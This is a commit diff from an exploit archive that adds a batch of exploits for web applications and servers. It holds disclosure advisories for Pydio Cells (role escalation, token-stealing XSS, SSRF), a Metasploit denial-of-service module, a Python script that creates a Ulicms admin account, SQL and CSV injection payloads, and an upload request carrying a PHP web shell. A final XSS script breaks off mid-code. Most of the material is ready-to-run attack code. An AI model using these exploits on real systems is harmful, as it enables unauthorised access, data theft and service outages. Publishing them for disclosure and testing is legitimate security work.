DB: 2023-06-01

13 changes to exploits/shellcodes/ghdb Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Pydio Cells 4.1.2 - Server-Side Request Forgery Pydio Cells 4.1.2 - Unauthorised Role Assignments Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) Faculty Evaluation System 1.0 - Unauthenticated File Upload Online Security Guards Hiring System 1.0 - Reflected XSS Online shopping system advanced 1.0 - Multiple Vulnerabilities Rukovoditel 3.3.1 - CSV injection SCRMS 2023-05-27 1.0 - Multiple SQL Injection Service Provider Management System v1.0 - SQL Injection Ulicms-2023.1-sniffing-vicuna - Privilege escalation unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
2023-06-01 00:16:25 +00:00 · 2023-06-01 00:16:25 +00:00 · cb5c64da21
commit cb5c64da21
parent 9e36596021
13 changed files with 1247 additions and 2 deletions
--- a/exploits/go/webapps/51496.txt
+++ b/exploits/go/webapps/51496.txt
@ -0,0 +1,217 @@
 Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
 Affected Versions: 4.1.2 and earlier versions
 Fixed Versions: 4.2.0, 4.1.3, 3.0.12
 Vulnerability Type: Privilege Escalation
 Security Risk: high
 Vendor URL: https://pydio.com/
 Vendor Status: notified
 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
 Advisory Status: published
 CVE: CVE-2023-32749
 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749
 Introduction
 ============
 "Pydio Cells is an open-core, self-hosted Document Sharing and
 Collaboration platform (DSC) specifically designed for organizations
 that need advanced document sharing and collaboration without security
 trade-offs or compliance issues."
 (from the vendor's homepage)
 More Details
 ============
 Users can share cells or folders with other users on the same Pydio
 instance. The web application allows to either select an already
 existing user from a list or to create a new user by entering a new
 username and password, if this functionality is enabled. When creating a
 new user in this way, a HTTP PUT request like the following is sent:
 ------------------------------------------------------------------------
 PUT /a/user/newuser HTTP/2
 Host: example.com
 User-Agent: agent
 Authorization: Bearer O48gvjD[...]
 Content-Type: application/json
 Content-Length: 628
 Cookie: token=AO[...]
 {
  "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
  },
  "Roles": [],
  "Login": "newuser",
  "Password": "secret!",
  "GroupPath": "/",
  "Policies": [...]
 }
 ------------------------------------------------------------------------
 The JSON object sent in the body contains the username and password
 for the user to be created and an empty list for the key "Roles". The
 response contains a JSON object similar to the following:
 ------------------------------------------------------------------------
 {
  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
  "GroupPath": "/",
  "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
  },
  "Roles": [
    {
      "Uuid": "EXTERNAL_USERS",
      "Label": "External Users",
      "Policies": [...]
    },
    {
      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
      "Label": "User newuser",
      "UserRole": true,
      "Policies": [...]
    }
  ],
  "Login": "newuser",
  "Policies": [....],
  "PoliciesContextEditable": true
 }
 ------------------------------------------------------------------------
 The key "Roles" now contains a list with two objects, which seem to be
 applied by default. The roles list in the HTTP request can be
 modified to contain a list of all available UUIDs for roles, which can
 be obtained by using the user search functionality. This results in a
 new user account with all roles applied. By performing a login as the
 newly created user, access to all cells and non-personal workspaces of
 the whole Pydio instance is granted.
 Proof of Concept
 ================
 Login to the Pydio Cells web interface with a regular user and retrieve
 the JWT from the HTTP requests. This can either be done using an HTTP
 attack proxy or using the browser's developer tools. Subsequently, curl [1]
 can be used as follows to retrieve a list of all users and their roles:
 ------------------------------------------------------------------------
 $ export JWT="<insert JWT here>"
 $ curl --silent \
 --header "Authorization: Bearer $TOKEN" \
 --header 'Content-Type: application/json' \
 --data '{}' \
 https://example.com/a/user | tee all_users.json
 {"Users":[...]}
 ------------------------------------------------------------------------
 Afterwards, jq [2] can be used to create a JSON document which can be
 sent to the Pydio REST-API in order to create the external user "foobar"
 with the password "hunter2" and all roles assigned:
 ------------------------------------------------------------------------
 $ jq '.Users[].Roles' all_users.json \
 | jq -s 'flatten | .[].Uuid | {Uuid: .}' \
 | jq -s 'unique' \
 | jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
 {"profile": "shared"}, "Roles": .}' \
 | tee create_user.json
 {
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
 }
 ------------------------------------------------------------------------
 Finally, the following curl command can be issued to create the new external
 user:
 ------------------------------------------------------------------------
 $ curl --request PUT \
 --silent \
 --header "Authorization: Bearer $JWT" \
 --header 'Content-Type: application/json' \
 --data @create_user.json \
 https://example.com/a/user/foobar
 ------------------------------------------------------------------------
 Now, login with the newly created user to access all cells and
 non-personal workspaces.
 Workaround
 ==========
 Disallow the creation of external users in the authentication settings.
 Fix
 ===
 Upgrade Pydio Cells to a version without the vulnerability.
 Security Risk
 =============
 Attackers with access to any regular user account for a Pydio Cells instance can
 extend their privileges by creating a new external user with all roles
 assigned. Subsequently, they can access all folders and files in any
 cell and workspace, except for personal workspaces. The creation of
 external users is activated by default. Therefore, the vulnerability is
 estimated to pose a high risk.
 Timeline
 ========
 2023-03-23 Vulnerability identified
 2023-05-02 Customer approved disclosure to vendor
 2023-05-02 Vendor notified
 2023-05-03 CVE ID requested
 2023-05-08 Vendor released fixed version
 2023-05-14 CVE ID assigned
 2023-05-16 Vendor asks for a few more days before the advisory is released
 2023-05-30 Advisory released
 References
 ==========
 [1] https://curl.se/
 [2] https://stedolan.github.io/jq/
 RedTeam Pentesting GmbH
 =======================
 RedTeam Pentesting offers individual penetration tests performed by a
 team of specialised IT-security experts. Hereby, security weaknesses in
 company networks or products are uncovered and can be fixed immediately.
 As there are only few experts in this field, RedTeam Pentesting wants to
 share its knowledge and enhance the public knowledge with research in
 security-related areas. The results are made available as public
 security advisories.
 More information about RedTeam Pentesting can be found at:
 https://www.redteam-pentesting.de/
 Working at RedTeam Pentesting
 =============================
 RedTeam Pentesting is looking for penetration testers to join our team
 in Aachen, Germany. If you are interested please visit:
 https://jobs.redteam-pentesting.de/
--- a/exploits/go/webapps/51497.txt
+++ b/exploits/go/webapps/51497.txt
@ -0,0 +1,195 @@
 Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
 Affected Versions: 4.1.2 and earlier versions
 Fixed Versions: 4.2.0, 4.1.3, 3.0.12
 Vulnerability Type: Cross-Site Scripting
 Security Risk: high
 Vendor URL: https://pydio.com/
 Vendor Status: notified
 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004
 Advisory Status: published
 CVE: CVE-2023-32751
 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751
 Introduction
 ============
 "Pydio Cells is an open-core, self-hosted Document Sharing and
 Collaboration platform (DSC) specifically designed for organizations
 that need advanced document sharing and collaboration without security
 trade-offs or compliance issues."
 (from the vendor's homepage)
 More Details
 ============
 When a file named "xss.html" is downloaded in the Pydio Cells web application, a
 download URL similar to the following is generated:
 https://example.com/io/xss/xss.html
  ?AWSAccessKeyId=gateway
  &Expires=1682495748
  &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D
  &response-content-disposition=attachment%3B%20filename%3Dxss.html
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]
 The URL is akin to a presigned URL as used by the Amazon S3 service. It
 contains the URL parameter "response-content-disposition" which is set
 to "attachment" causing the response to contain a "Content-Disposition"
 header with that value. Therefore, the browser downloads the file
 instead of interpreting it. The URL also contains a signature and expiry
 timestamp, which are checked by the backend. Unlike a presigned URL as used
 by S3, the URL also contains the parameter "pydio_jwt" with the JWT of
 the user for authentication. Furthermore, the access key with the ID
 "gateway" is referenced, which can be found in the JavaScript sources of
 Pydio Cells together with the secret:
 ------------------------------------------------------------------------
 _awsSdk.default.config.update({
  accessKeyId: 'gateway',
  secretAccessKey: 'gatewaysecret',
  s3ForcePathStyle: !0,
  httpOptions: {
    timeout: PydioApi.getMultipartUploadTimeout()
  }
 });
 ------------------------------------------------------------------------
 With this information it is possible to change the URL parameter
 "response-content-disposition" to the value "inline" and then calculate
 a valid signature for the resulting URL. Furthermore, the content type of
 the response can be changed to "text/html" by also adding the URL
 parameter "response-content-type" with that value. This would result in
 a URL like the following for the previously shown example URL:
 https://example.com/io/xss/xss.html?
  AWSAccessKeyId=gateway
  &Expires=1682495668
  &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D
  &response-content-disposition=inline
  &response-content-type=text%2Fhtml
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]
 Upon opening the URL in a browser, the HTML included in the file is
 interpreted and any JavaScript code is run.
 Proof of Concept
 ================
 Upload a HTML file into an arbitrary location of a Pydio Cells instance.
 For example with the following contents:
 ------------------------------------------------------------------------
 <html>
  <body>
    <h1>Cross-Site Scriping</h1>
    <script>
      let token = JSON.parse(localStorage.token4).AccessToken;
      alert(token);
    </script>
  </body>
 </html>
 ------------------------------------------------------------------------
 The contained JavaScript code reads the JWT access token for Pydio Cells
 from the browser's local storage object and opens a message box. Instead
 of just displaying the JWT, it could also be sent to an attacker. The
 following JavaScript function can then be run within the browser's
 developer console to generate a presigned URL for the HTML file:
 ------------------------------------------------------------------------
 async function getPresignedURL(path) {
  let client = PydioApi.getClient();
  let node = new AjxpNode(path);
  let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"};
  let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);
  return url;
 }
 await getPresignedURL("xss/xss.html");
 ------------------------------------------------------------------------
 The code has to be run in context of Pydio Cells while being logged in.
 If the resulting URL is opened in a browser, the JavaScript code
 contained in the HTML file is run. If the attack is conducted in the
 described way, the JWT of the attacker is exposed through the URL.
 However, this can be circumvented by first generating a public URL
 for the file and then constructing the presigned URL based on the
 resulting download URL.
 Workaround
 ==========
 No workaround known.
 Fix
 ===
 Upgrade Pydio Cells to a version without the vulnerability.
 Security Risk
 =============
 Attackers that can upload files to a Pydio Cells instance can construct
 URLs that execute arbitrary JavaScript code in context of Pydio Cells
 upon opening. This could for example be used to steal the authentication
 tokens of users opening the URL. It is likely that such an attack
 succeeds, since sharing URLs to files hosted using Pydio Cells is a
 common use case of the application. Therefore, the vulnerability is
 estimated to pose a high risk.
 Timeline
 ========
 2023-03-23 Vulnerability identified
 2023-05-02 Customer approved disclosure to vendor
 2023-05-02 Vendor notified
 2023-05-03 CVE ID requested
 2023-05-08 Vendor released fixed version
 2023-05-14 CVE ID assigned
 2023-05-16 Vendor asks for a few more days before the advisory is released
 2023-05-30 Advisory released
 References
 ==========
 [1] https://aws.amazon.com/sdk-for-javascript/
 RedTeam Pentesting GmbH
 =======================
 RedTeam Pentesting offers individual penetration tests performed by a
 team of specialised IT-security experts. Hereby, security weaknesses in
 company networks or products are uncovered and can be fixed immediately.
 As there are only few experts in this field, RedTeam Pentesting wants to
 share its knowledge and enhance the public knowledge with research in
 security-related areas. The results are made available as public
 security advisories.
 More information about RedTeam Pentesting can be found at:
 https://www.redteam-pentesting.de/
 Working at RedTeam Pentesting
 =============================
 RedTeam Pentesting is looking for penetration testers to join our team
 in Aachen, Germany. If you are interested please visit:
 https://jobs.redteam-pentesting.de/
 --
 RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
 Alter Posthof 1                           Fax : +49 241 510081-99
 52062 Aachen                    https://www.redteam-pentesting.de
 Germany                         Registergericht: Aachen HRB 14004
 Geschäftsführer:                       Patrick Hof, Jens Liebchen
--- a/exploits/go/webapps/51498.txt
+++ b/exploits/go/webapps/51498.txt
@ -0,0 +1,148 @@
 Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery
 Affected Versions: 4.1.2 and earlier versions
 Fixed Versions: 4.2.0, 4.1.3, 3.0.12
 Vulnerability Type: Server-Side Request Forgery
 Security Risk: medium
 Vendor URL: https://pydio.com/
 Vendor Status: notified
 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
 Advisory Status: published
 CVE: CVE-2023-32750
 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750
 Introduction
 ============
 "Pydio Cells is an open-core, self-hosted Document Sharing and
 Collaboration platform (DSC) specifically designed for organizations
 that need advanced document sharing and collaboration without security
 trade-offs or compliance issues."
 (from the vendor's homepage)
 More Details
 ============
 Using the REST-API of Pydio Cells it is possible to start jobs. For
 example, when renaming a file or folder an HTTP request similar to the
 following is sent:
 ------------------------------------------------------------------------
 PUT /a/jobs/user/move HTTP/2
 Host: example.com
 User-Agent: agent
 Accept: application/json
 Authorization: Bearer G4ZRN[...]
 Content-Type: application/json
 Content-Length: 140
 {
  "JobName": "move",
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
 }
 ------------------------------------------------------------------------
 The body contains a JSON object with a job name and additional
 parameters for the job. Besides the "move" job, also a job with the name
 "remote-download" exists. It takes two additional parameters: "urls" and
 "target". In the "urls" parameter, a list of URLs can be specified and in
 the parameter "target" a path can be specified in which to save the
 response. When the job is started, HTTP GET requests are sent from the
 Pydio Cells server to the specified URLs. The responses are saved into a
 file, which are uploaded to the specified folder within Pydio Cells.
 Potential errors are transmitted in a WebSocket channel, which can be
 opened through the "/ws/event" endpoint.
 Proof of Concept
 ================
 Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
 run the following commands to start a "remote-download" job to trigger
 an HTTP request:
 ------------------------------------------------------------------------
 $ export JWT="<insert JWT here>"
 $ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
 | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
 | tee remote-download.json
 $ curl --header "Authorization: Bearer $JWT" \
 --header 'Content-Type: application/json' \
 --request PUT \
 --data @remote-download.json 'https://example.com/a/jobs/user/remote-download'
 ------------------------------------------------------------------------
 The URL in the JSON document specifies which URL to request. The "target"
 field in the same document specifies into which folder the response is saved.
 Afterwards, the response is contained in a file in the specified folder.
 Potential errors are communicated through the WebSocket channel.
 Workaround
 ==========
 Limit the services which can be reached by the Pydio Cells server, for
 example using an outbound firewall.
 Fix
 ===
 Upgrade Pydio Cells to a version without the vulnerability.
 Security Risk
 =============
 The risk is highly dependent on the environment in which the attacked
 Pydio Cells instance runs. If there are any internal HTTP services which
 expose sensitive data on the same machine or within the same network,
 the server-side request forgery vulnerability could pose a significant
 risk. In other circumstances, the risk could be negligible. Therefore,
 overall the vulnerability is rated as a medium risk.
 Timeline
 ========
 2023-03-23 Vulnerability identified
 2023-05-02 Customer approved disclosure to vendor
 2023-05-02 Vendor notified
 2023-05-03 CVE ID requested
 2023-05-08 Vendor released fixed version
 2023-05-14 CVE ID assigned
 2023-05-16 Vendor asks for a few more days before the advisory is released
 2023-05-30 Advisory released
 References
 ==========
 RedTeam Pentesting GmbH
 =======================
 RedTeam Pentesting offers individual penetration tests performed by a
 team of specialised IT-security experts. Hereby, security weaknesses in
 company networks or products are uncovered and can be fixed immediately.
 As there are only few experts in this field, RedTeam Pentesting wants to
 share its knowledge and enhance the public knowledge with research in
 security-related areas. The results are made available as public
 security advisories.
 More information about RedTeam Pentesting can be found at:
 https://www.redteam-pentesting.de/
 Working at RedTeam Pentesting
 =============================
 RedTeam Pentesting is looking for penetration testers to join our team
 in Aachen, Germany. If you are interested please visit:
 https://jobs.redteam-pentesting.de/
--- a/exploits/multiple/remote/51493.rb
+++ b/exploits/multiple/remote/51493.rb
@ -0,0 +1,98 @@
 ##
 # Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
 # Date: 2018-03-09
 # Exploit Author: Ege Balci
 # Vendor Homepage: https://www.flexense.com/downloads.html
 # Version: <= 10.6.24
 # CVE : CVE-2018-8065
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Flexense HTTP Server Denial Of Service',
      'Description'    => %q{
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
        Vulnerability caused by a user mode write access memory violation and can be triggered with
        rapidly sending variety of HTTP requests with long HTTP header values.
        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
      },
      'Author' 		=> [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
      'DisclosureDate' => '2018-03-09'))
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])
      ])
  end
  def check
    begin
      connect
      sock.put("GET / HTTP/1.0\r\n\r\n")
      res = sock.get
      if res and res.include? 'Flexense HTTP Server v10.6.24'
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue Rex::ConnectionRefused
      print_error("Target refused the connection")
      Exploit::CheckCode::Unknown
    rescue
      print_error("Target did not respond to HTTP request")
      Exploit::CheckCode::Unknown
    end
  end
  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    size = datastore['PacketSize'].to_i
    print_status("Starting with packets of #{size}-byte strings")
    count = 0
    loop do
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: "+('A' * size)+"\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        disconnect
        count += 1
        break if count==datastore['PacketCount']
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination!  Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout!  Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset!  Continuing...')
      rescue ::Rex::ConnectionRefused
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
 end
--- a/exploits/multiple/webapps/51499.txt
+++ b/exploits/multiple/webapps/51499.txt
@ -0,0 +1,38 @@
 # Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
 # Author: tmrswrr
 # Date: 31/05/2023
 # Vendor: https://www.motocms.com
 # Link: https://www.motocms.com/website-templates/demo/189526.html
 # Vulnerable Version(s): MotoCMS  3.0.27
 ## Description
 MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
 Injection (SSTI) vulnerability via the keyword parameter.
 ## Steps to Reproduce
 1. Open the target URL: https://template189526.motopreview.com/
 2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
 3. You will be see result is 49
 Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
 GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
 Host: template189526.motopreview.com
 Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Dnt: 1
 Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: iframe
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 Te: trailers
 Connection: close
--- a/exploits/php/webapps/51433.py
+++ b/exploits/php/webapps/51433.py
@ -0,0 +1,32 @@
 #Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
 #Application: Ulicms
 #Version: 2023.1-sniffing-vicuna
 #Bugs:  Privilege escalation
 #Technology: PHP
 #Vendor URL: https://en.ulicms.de/
 #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
 #Date of found: 04-05-2023
 #Author: Mirabbas Ağalarov
 #Tested on: Linux
 ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
 import requests
 new_name=input("name: ")
 new_email=input("email: ")
 new_pass=input("password: ")
 url = "http://localhost/dist/admin/index.php"
 headers = {"Content-Type": "application/x-www-form-urlencoded"}
 data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
 response = requests.post(url, headers=headers, data=data)
 if response.status_code == 200:
    print("Request is success and created new admin account")
 else:
    print("Request is failure.!!")
--- a/exploits/php/webapps/51490.txt
+++ b/exploits/php/webapps/51490.txt
@ -0,0 +1,19 @@
 Exploit Title: Rukovoditel 3.3.1 - CSV injection
 Version: 3.3.1
 Bugs:  CSV Injection
 Technology: PHP
 Vendor URL: https://www.rukovoditel.net/
 Software Link: https://www.rukovoditel.net/download.php
 Date of found: 27-05-2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 Step 1. login as user
 step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account )
 step 3. Set Firstname as  =calc|a!z|
 step 3. If admin Export costumers as CSV  file ,in The computer of admin  occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1)
 payload: =calc|a!z|
--- a/exploits/php/webapps/51491.txt
+++ b/exploits/php/webapps/51491.txt
@ -0,0 +1,50 @@
 ## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi
 ## Author: nu11secur1ty
 ## Date: 05.27.2023
 ## Vendor: https://github.com/oretnom23
 ## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
 ## Reference: https://portswigger.net/web-security/sql-injection
 ## Description:
 The `email` parameter appears to be vulnerable to SQL injection
 attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or
 5206=5213-- were each submitted in the email parameter. These two
 requests resulted in different responses, indicating that the input is
 being incorporated into a SQL query in an unsafe way. The attacker can
 easily steal all users and their passwords for access to the system.
 Even if they are strongly encrypted this will get some time, but this
 is not a problem for an attacker to decrypt if, if they are not enough
 strongly encrypted.
 STATUS: HIGH Vulnerability
 [+]Payload:
 ```mysql
 ---
 Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
 ---
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)
 ## Proof and Exploit:
 [href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)
 ## Time spend:
 01:00:00
 --
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at
 https://packetstormsecurity.com/https://cve.mitre.org/index.html and
 https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/php/webapps/51492.txt
+++ b/exploits/php/webapps/51492.txt
@ -0,0 +1,106 @@
 Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
 Google Dork : NA
 Date: 19-01-2023
 Exploit Author: AFFAN AHMED
 Vendor Homepage: https://github.com/unilogies/bumsys
 Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
 Version: 1.0.3-beta
 Tested on: Windows 11, XAMPP-8.2.0
 CVE : CVE-2023-0455
 ================================
 Steps_TO_Reproduce
 ================================
 - Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
 - Click on action button to edit the Profile
 - Click on select logo button to upload the image
 - Intercept the POST Request  and do the below changes .
 ================================================================
 Burpsuite-Request
 ================================================================
 POST /xhr/?module=settings&page=updateShop HTTP/1.1
 Host: demo.bumsys.org
 Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
 Content-Length: 1280
 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
 X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
 Sec-Ch-Ua-Mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
 Accept: */*
 X-Requested-With: XMLHttpRequest
 Sec-Ch-Ua-Platform: "Windows"
 Origin: https://demo.bumsys.org
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: https://demo.bumsys.org/settings/shop-list/
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Connection: close
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopName"
 TEST
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopAddress"
 test
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopCity"
 testcity
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopState"
 teststate
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopPostalCode"
 700056
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopCountry"
 testIND
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopPhone"
 895623122
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopEmail"
 test@gmail.com
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopInvoiceFooter"
 ------WebKitFormBoundarynO0QAD84ekUMuGaA
 Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
 Content-Type: image/png
 <?php echo system($_REQUEST['dx']); ?>
 ====================================================================================
 Burpsuite-Response
 ====================================================================================
 HTTP/1.1 200 OK
 Date: Thu, 19 Jan 2023 07:14:26 GMT
 Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
 X-Powered-By: PHP/7.0.33
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Connection: close
 Content-Type: text/html; charset=UTF-8
 Content-Length: 65
 <div class='alert alert-success'>Shop successfully updated.</div>
 ====================================================================================
 VIDEO-POC : https://youtu.be/nwxIoSlyllQ
--- a/exploits/php/webapps/51494.py
+++ b/exploits/php/webapps/51494.py
@ -0,0 +1,94 @@
 #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
 #Google Dork : NA
 #Date: 23-01-2023
 #Exploit Author : AFFAN AHMED
 #Vendor Homepage: https://phpgurukul.com
 #Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
 #Version: 1.0
 #Tested on: Windows 11 + XAMPP + PYTHON-3.X
 #CVE : CVE-2023-0527
 #NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
 # Below code check for both the parameter /admin-profile.php and in /search.php
 #POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
 import requests
 import re
 from colorama import Fore
 print(Fore.YELLOW + "######################################################################" + Fore.RESET)
 print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
 print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
 print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
 print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
 print(Fore.YELLOW +"######################################################################" + Fore.RESET)
 print()
 print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
 print()
 # NAVIGATING TO ADMIN LOGIN PAGE
 Website_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUP
 print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
 print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
 print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)
 Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
 headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
